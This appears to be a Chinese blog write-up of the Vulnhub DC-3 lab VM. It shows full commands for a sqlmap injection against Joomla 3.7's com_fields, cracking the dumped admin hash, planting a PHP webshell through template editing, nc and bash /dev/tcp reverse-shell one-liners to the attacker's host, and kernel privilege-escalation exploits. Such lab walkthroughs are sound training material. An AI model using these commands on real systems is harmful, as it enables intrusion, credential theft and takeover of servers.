【Vulnhub系列】DC3


靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip

基本信息

Kali:192.168.61.145

DC3:192.168.61.163

实验过程

同样先通过arpscan扫描找出DC3的IP地址

sudo arp-scan --interface eth0 192.168.61.1/24

这里可以直接看出DC3的IP地址为192.168.61.163

然后我们使用nmap对目标进行扫描

发现目标主机只是打开了80端口

在这里插入图片描述

然后我们查看下80端口,通过wappalyzer,发现用的是Joomla

同时主页也给我们提示,表明这个靶机只有一个flag
在这里插入图片描述

在这里插入图片描述

这里我们使用joomscan专用扫描器,来获取网页更详细的信息

joomscan:https://github.com/OWASP/joomscan

perl joomscan.pl -u http://192.168.61.163

在这里插入图片描述

可以看到joomla的详细版本号和管理后台

在这里插入图片描述

我们通过searchsploit查看是否有可以用的EXP

searchsploit joomla 3.7

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gJV5fpWm-1617862511015)(45588D1F98CB41D7AE768DE714D394C0)]

可以看到有一个SQL注入漏洞

searchsploit -x php/webapps/42033.txt

在这里插入图片描述

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

接下来就是导出admin的账号密码,就只放个最后的结果图,攻击过程的语句如下

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomaladb --tables

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#__users" --columns

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fGmPoQ2i-1617862511022)(2783758B28224F64AB8B3AEFF69011C2)]

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

我们将password的HASH值用john进行破解

在这里插入图片描述

解密后的结果为:snoopy

我们尝试进行登陆,发现是正确的账号密码

账号:admin
密码:snoopy

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R5FfxlOS-1617862511031)(1B7E2F5C471E4DF886BEFE8854449231)]

在这里插入图片描述

进入后台后,就要想办法上传一句话木马。

百度到可以编辑模板来上传一个webshell

在这里插入图片描述

这里编辑Beez3模板
在这里插入图片描述

这里我在html目录下创建了一个名为dfz.php的webshell

在这里插入图片描述

然后我们访问下这个webshell,没有出现404说明成功上传

http://192.168.61.163/templates/beez3/html/dfz.php

在这里插入图片描述

接下来用蚁剑来链接
在这里插入图片描述

我们在Kali上使用nc,通过蚁剑反弹一个shell

我们现在Kali上建立监听
在这里插入图片描述

发现DC3上有python环境,尝试使用python来弹shell,但是Kali上没有任何反应

在这里插入图片描述

然后尝试使用bash来弹shell,但是也是不行
在这里插入图片描述

尝试使用nc反弹成功

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.61.145 2222 >/tmp/f

在这里插入图片描述

然后使用python改善shell环境

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

获取下Linux版本,可以看到是Ubuntu 16.04
在这里插入图片描述

我们查找下有没有可以利用的提权EXP,通过searchsploit有好几个

在这里插入图片描述

这里我们使用下面的EXP尝试提权

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                             | linux/local/39772.txt

我们打开这个EXP的介绍,并到指定网站下载
在这里插入图片描述

https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip

通过蚁剑上传到靶机
在这里插入图片描述

然后接下来的话就是解压、编译、执行EXP来获得root权限,所有命令如下

unzip 39772.zip
cd 39772
tar -xvf exploit.tar

在这里插入图片描述

./compile.sh

在这里插入图片描述

./doubleput

在这里插入图片描述

获得flag
在这里插入图片描述

额外补充

利用php反弹shell

system("bash -c 'bash -i >& /dev/tcp/192.168.61.145/2222 0>&1'");

在这里插入图片描述

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.61.145 2222 >/tmp/f');

在这里插入图片描述

使用Linux-Exploit-suggestion来辅助提权

下载地址:https://github.com/mzet-/linux-exploit-suggester

上传到/tmp中,并加权执行

chmod +x linux-exploit-suggester.sh

在这里插入图片描述

在这里插入图片描述

这里尝试下CVE-2016-5195

EXP地址:https://github.com/gbonacini/CVE-2016-5195

下载完成后通过蚁剑上传,并解压

在这里插入图片描述

然后进入目录后make下就可以得到dcow文件,执行./dcow -s 尝试提权

然后靶机就死机了,说明这个EXP不适合
在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值